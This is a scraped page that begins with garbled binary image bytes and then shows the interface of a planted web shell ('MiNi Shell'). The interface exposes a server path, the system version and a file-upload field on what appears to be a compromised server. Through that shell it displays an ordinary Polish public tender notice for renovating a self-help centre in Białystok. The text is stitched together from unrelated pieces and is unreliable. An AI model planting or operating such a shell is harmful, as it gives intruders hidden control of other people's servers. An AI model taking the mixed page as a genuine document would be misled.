JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211011/0022837601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> " Remont pomieszczeń Środowiskowego Domu Samopomocy"- powtórka. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ŚRODOWISKOWY DOM SAMOPOMOCY W BIAŁYMSTOKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 382544244</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 11 Listopada 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(85) 653-77-43</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(85) 653-77-43</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">retariat@sds.bialystok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sdsbip.um.bialystok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> " Remont pomieszczeń Środowiskowego Domu Samopomocy"- powtórka. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f29ad83d-2aa4-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00228376</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W celu<br/>korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika urządzeniem<br/>teleinformatycznym z dostępem do sieci Internet. Aplikacja działa na Platformie Windows, Mac i Linux.<br/>Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru<br/>danych:<br/>- specyfikacja połączenia - Formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>- format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem<br/>UTF-8,<br/>- oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane<br/>zapisywane są z dokładnością co do setnej części sekundy,<br/>- integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP.<br/>W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego<br/>automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru czyli Urzędowe Poświadczenie<br/>Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji „Dane<br/>poświadczenia” jest zawarta informacja o dacie doręczenia.<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/>- Microsoft Internet Explorer od wersji 11.0<br/>- Mozilla Firefox od wersji 15<br/>- Google Chrome od wersji 20<br/>- Microsoft Edge</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia PEiRady (UE)<br/>2016/679 w spr.ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE Zamawiający informuje, iż<br/>administratorem danych osobowych jest Środowiskowy Dom Samopomocy w Białymstoku. W spr. dot.<br/>przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej<br/>pod adresem: sekretariat@sds.bialystok.pl lub telefonicznie pod numerem 85 653-77-43. Zamawiający<br/>przetwarza dane osobowe zebrane w postępowaniu o udzielenie zamówienia w sposób gwarantujący<br/>zabezpieczenie przed ich bezprawnym rozpowszechnianiem. Zamawiający udostępnia dane osobowe,<br/>o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o<br/>których mowa w dziale VI PZP, do upływu terminu do ich wniesienia. Do przetwarzania danych, o<br/>których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie.<br/>Osoby dopuszczone do przetwarzania danych są obowiązane do zachowania ich w poufności. Dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit.c RODO w celu związanym z prowadzeniem<br/>postępowania oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art.<br/>255-256 PZP w celu zawarcia umowy w sprawie zamówienia oraz jej realizacji, a także<br/>udokumentowania postępowania i jego archiwizacji. Odbiorcami danych osobowych będą osoby lub<br/>podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP. Dane<br/>osobowe pozyskane w związku z prowadzeniem postępowania będą przechowywane, zgodnie z art.<br/>78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia<br/>publicznego. W przypadku zawarcia umowy w sprawie zam.pub. dane osobowe będą przetwarzane do<br/>upływu okresu przedawnienia roszczeń wynikających z umowy. Dane osobowe pozyskane w związku<br/>z prowadzeniem postępowania mogą zostać przekazane podmiotom świadczącym usługi doradcze, w<br/>tym usługi prawne, i konsultingowe, Stosownie do art. 22 RODO, decyzje dotyczące danych nie będą<br/>podejmowane w sposób zautomatyzowany. Osoba, której dotyczą pozyskane w związku z<br/>prowadzeniem niniejszego postępowania dane osobowe, ma prawo<br/>1) dostępu do swoich danych osobowych zgodnie z art. 15 RODO, przy czym w sytuacji, gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie<br/>dużego wysiłku Zamawiający może żądać wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego<br/>postępowania o udzielenie zamówienia publicznego;<br/>2) do sprostowana swoich danych osobowych zgodnie z art. 16 RODO, przy czym skorzystanie z<br/>uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO,<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą<br/>postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu<br/>oraz jego załączników<br/>3) do żądania od Zamawiającego jako administratora, ograniczenia przetwarzania danych osobowych<br/>z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego UE lub państwa członkowskiego;<br/>prawo to nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia;<br/>4) wniesienia skargi do Prezesa UODO w przypadku uznania, iż przetwarzanie jej danych osobowych<br/>narusza przepisy o ochronie danych osobowych, w tym przepisy RODO<br/>Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach PZP</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie, której dane osobowe zostały pozyskane przez<br/>Zamawiającego w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia<br/>publicznego nie przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21<br/>RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą<br/>prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. Dane osobowe mogą być<br/>przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych<br/>na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w<br/>ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność<br/>kontrolną wobec Zamawiającego. Dane osobowe są przekazywane do podmiotów przetwarzających<br/>dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie remontu pomieszczeń Środowiskowego Domu<br/>Samopomocy. Przedmiot zamówienia obejmuje wykonanie robót:<br/>1) rozbiórkowych<br/>2) sanitarnych<br/>3) elektrycznych<br/>4) wykonanie izolacji<br/>5) posadzek<br/>6) malarskie<br/>7) budowlanych<br/>3.2 Lokalizacja inwestycji: budynek mieszczący się w Białymstoku przy ul. 11 listopada 6.<br/>3.3 Szczegółowy zakres robót budowlanych objętych przedmiotem zamówienia określony<br/>został:<br/>1) w dokumentacji projektowej. WW. dokumentacja stanowi załącznik nr 8 do SWZ.<br/>2) specyfikacji technicznej wykonania i odbioru robót (STWIORB), stanowiących załączniki do<br/>specyfikacji warunków zamówienia - załącznik nr 9 do SWZ.<br/>3) przedmiary załącznik nr 10 do SWZ.<br/>4) oraz projektowanych postanowieniach umowy w sprawie zamówienia publicznego<br/>stanowiących załącznik nr 11 do specyfikacji warunków zamówienia.<br/>Pozostałe wymagania określono w rozdziale 3 SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu z<br/>postępowania na warunkach określonych w rozdziale 6 SWZ oraz spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym :<br/>- Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów :<br/>- Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>- Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w odniesieniu do warunku dot. zdolności ekonomicznej.<br/>- Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca wykaże, że<br/>posiada środki finansowe lub zdolność kredytową nie mniejszą niż: 100.000 PLN (słownie: sto<br/>tysięcy złotych 00/100)<br/>4) zdolności technicznej lub zawodowej:<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie) wykonał należycie co najmniej dwa<br/>zadania polegające na budowie, przebudowie, rozbudowie lub remoncie budynku o wartości<br/>robót nie mniejszej niż: 150.000 PLN brutto (słownie: sto pięćdziesiąt tysięcy ) każda.<br/>Uwaga:<br/>- Przez zamówienie wykonane należy rozumieć: zamówienia rozpoczęte i zakończone w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie).<br/>- Zamówienia zakończone w ww. okresie to zamówienia, których rozpoczęcie mogło nastąpić<br/>wcześniej niż w ww. okresie.<br/>- Zamawiający nie dopuszcza możliwości sumowania robót budowlanych o mniejszej wartości<br/>celem uzyskania wymaganej wartości referencyjnej.<br/>b) Warunek w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie<br/>uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował<br/>następującymi osobami<br/>1) Jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno – budowlanej zgodnie z przepisami ustawy z dnia 7 lipca 1994 r.<br/>Prawo Budowlane (Dz.U.2020.1333 t.j.) oraz aktów wykonawczych wydanych na podstawie w/w<br/>ustawy, bądź odpowiadające w/w uprawnieniom, ważne uprawnienie budowlane, wydane na<br/>podstawie wcześniej obowiązujących przepisów albo uprawnieniami zagranicznymi<br/>równoważnymi, uznanymi na terytorium Rzeczypospolitej Polskiej zgodnie z art. 12 a Prawa<br/>budowlanego, tj. ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej z dnia 22.12.2015 r.<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub<br/>kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub<br/>jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych.<br/>Wykonawca, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej<br/>lub ekonomicznej podmiotów udostępniających zasoby składa wraz z ofertą:<br/>1) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej, potwierdza, że<br/>stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty<br/>dostęp do tych zasobów oraz określa w szczególności:<br/>(1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>(2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>(3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane, których wskazane<br/>zdolności dotyczą. Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 7 do SWZ.<br/>2) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim wykonawca powołuje się na jego zasoby. UWAGA: Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności<br/>lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on<br/>w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>Wykonawca, który polega na zdolnościach technicznych lub zawodowych (warunki wskazane w<br/>pkt 7.1. pkt 4) SWZ na zasadach określonych w art. 118 PZP zobowiązany będzie do<br/>przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 9.1. lit d i e) SWZ,<br/>dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów<br/>podstawy wykluczenia z postępowania. Dokumenty, o których mowa w pkt 9.1. lit d) i e) SWZ<br/>wykonawca będzie obowiązany złożyć w terminie wskazanym przez Zamawiającego, nie<br/>krótszym niż 5 dni, określonym w wezwaniu wystosowanym przez Zamawiającego do<br/>wykonawcy po otwarciu ofert w trybie art. 274 ust. 1 PZP. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">7.1. Wykonawca będzie obowiązany przedstawić Zamawiającemu<br/>następujące podmiotowe środki dowodowe (w terminach wskazanych SWZ)<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane. Wykaz robót<br/>budowlanych stanowi załącznik nr 4 do SWZ.<br/>b) oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi wykonawcami informacje określone w wykazie robót budowlanych dotyczą robót<br/>budowlanych, w których wykonawca ten bezpośrednio uczestniczył.<br/>c) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania (wzór wykazu osób<br/>skierowanych przez wykonawcę do realizacji zamówienia 